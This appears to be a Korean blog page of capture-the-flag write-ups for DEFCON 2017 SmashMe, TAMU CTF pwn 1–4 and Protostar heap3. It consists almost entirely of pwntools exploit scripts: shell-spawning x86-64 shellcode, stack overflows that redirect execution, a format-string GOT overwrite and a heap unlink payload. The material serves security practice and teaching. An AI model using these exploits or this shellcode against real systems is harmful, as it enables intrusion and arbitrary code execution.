'0x0400 : Wargame'에 해당되는 글 61건

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
s = remote("smashme_omgbabysfirst.quals.shallweplayage.me", 57348)
s.recv(1024)
 
payload  = "\x90"*6
payload += "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 
 # shellcode 27bit
payload += "smash me outside how bout dAAAAAAAAAAA"
payload += "\x1b\x4e\x4c"
 
s.sendline(payload)
s.interactive()
Colored by Color Scripter
cs

저작자표시 비영리 변경금지

'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

2017 Hust CTF write up (0)	2017.05.28
defcon2016 - [rev]baby-re (0)	2017.05.21
RCTF - [misc]intoU (0)	2017.05.21
TAMU CTF - pwnable(1~4) (0)	2017.04.23
Defcon 23 - babycmd (0)	2017.01.12

TAMU CTF - pwnable(1~4)

2017. 4. 23. 15:57

B4sh5i

0x0400 : Wargame/0x0410 : CTF

pwn 1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
from time import *
 
context(arch='i386', os='linux')
r = remote('pwn.ctf.tamu.edu', 4322)
 
flag = 0xCA11AB1E
payload  = 'a'*0x1b
payload += p32(flag)
 
r.sendline(payload)
 
print r.recv(1024)
sleep(0.3)
 
 
Colored by Color Scripter
cs

pwn 2

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
s = remote("pwn.ctf.tamu.edu",4321)
elf = ELF("./pwn2")
 
flag = 0x0804854B
 
payload  = "A"*140
payload += p32(flag)
 
s.sendline(payload)
print s.recv(1024)
 
 
Colored by Color Scripter
cs

pwn 3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
from time import *
 
s = remote("pwn.ctf.tamu.edu", 4323)
s = process('./pwn3')
 
exit_got = 0x804a01c
print_flag = 0x80485ab - 4
 
payload  = p32(exit_got)
payload += '%%%dx' % print_flag
payload += '%%%d$n' % 4
 
 
print s.recvuntil('Enter a word to be echoed:')
s.sendline(payload)
print s.recvuntil('This function has been deprecated')
 
flag = s.recv(1024)
print flag
 
# 3번은..그냥 (python ~~~ |cat --) | nc 로 해결.
# 익스 코드는 payload를 가지고 gdb 에서 검증.
 
Colored by Color Scripter
cs

pwn 4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
s = remote("web.ctf.tamu.edu",4324)
#s.recvuntil("I require an input:")
 
sys = 0x80484d9 # <flag_func+14>
flag = 0x0804A028 # string meun
 
payload  = "A"*16
payload += p32(sys)
payload += p32(flag)
 
s.sendline(payload)
print s.recv(1024)
 
Colored by Color Scripter
cs

저작자표시 비영리 변경금지

'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

2017 Hust CTF write up (0)	2017.05.28
defcon2016 - [rev]baby-re (0)	2017.05.21
RCTF - [misc]intoU (0)	2017.05.21
DEFCON_2017 - SmashMe (0)	2017.05.08
Defcon 23 - babycmd (0)	2017.01.12

Pwnable.kr - uaf

2017. 2. 7. 17:25

B4sh5i

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

protostar - heap3

2017. 1. 22. 16:10

B4sh5i

0x0400 : Wargame/0x0409 : protostar

user@protostar:/opt/protostar/bin$ ./heap3 `python -c "print 'A'*4+'\x68\x64\x88\x04\x08\xc3'"` `python -c "print 'A'*32+'\xf9\xff\xff\xff'+'\xfc\xff\xff\xff'+'AAAAAAA'+'\x1c\xb1\x04\x08'+'\x0c\xc0\x04\x08'"` C

that wasn't too bad now, was it? @ 1480306857

user@protostar:/opt/protostar/bin$

저작자표시 비영리 변경금지

'0x0400 : Wargame > 0x0409 : protostar' 카테고리의 다른 글

Protostar - heap2 (0)	2017.01.22
Protostar - heap1 (0)	2017.01.16
protostar - heap0 (0)	2017.01.16

이전 1 2 3 4 5 ··· 7 다음

$bash

'0x0400 : Wargame'에 해당되는 글 61건

pwnable.tw - start

NOE.systems - [web]Home Alone

NOE.systems - [rev]Login System

NOE.systems - [rev] Slot Machine

NOE.systems - [rev]Break Time

NOE.systems - [pwn]card

DEFCON_2017 - SmashMe

'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

TAMU CTF - pwnable(1~4)

'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

Pwnable.kr - uaf

protostar - heap3

'0x0400 : Wargame > 0x0409 : protostar' 카테고리의 다른 글

티스토리툴바

« 2024/12 »
일	월	화	수	목	금	토
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30	31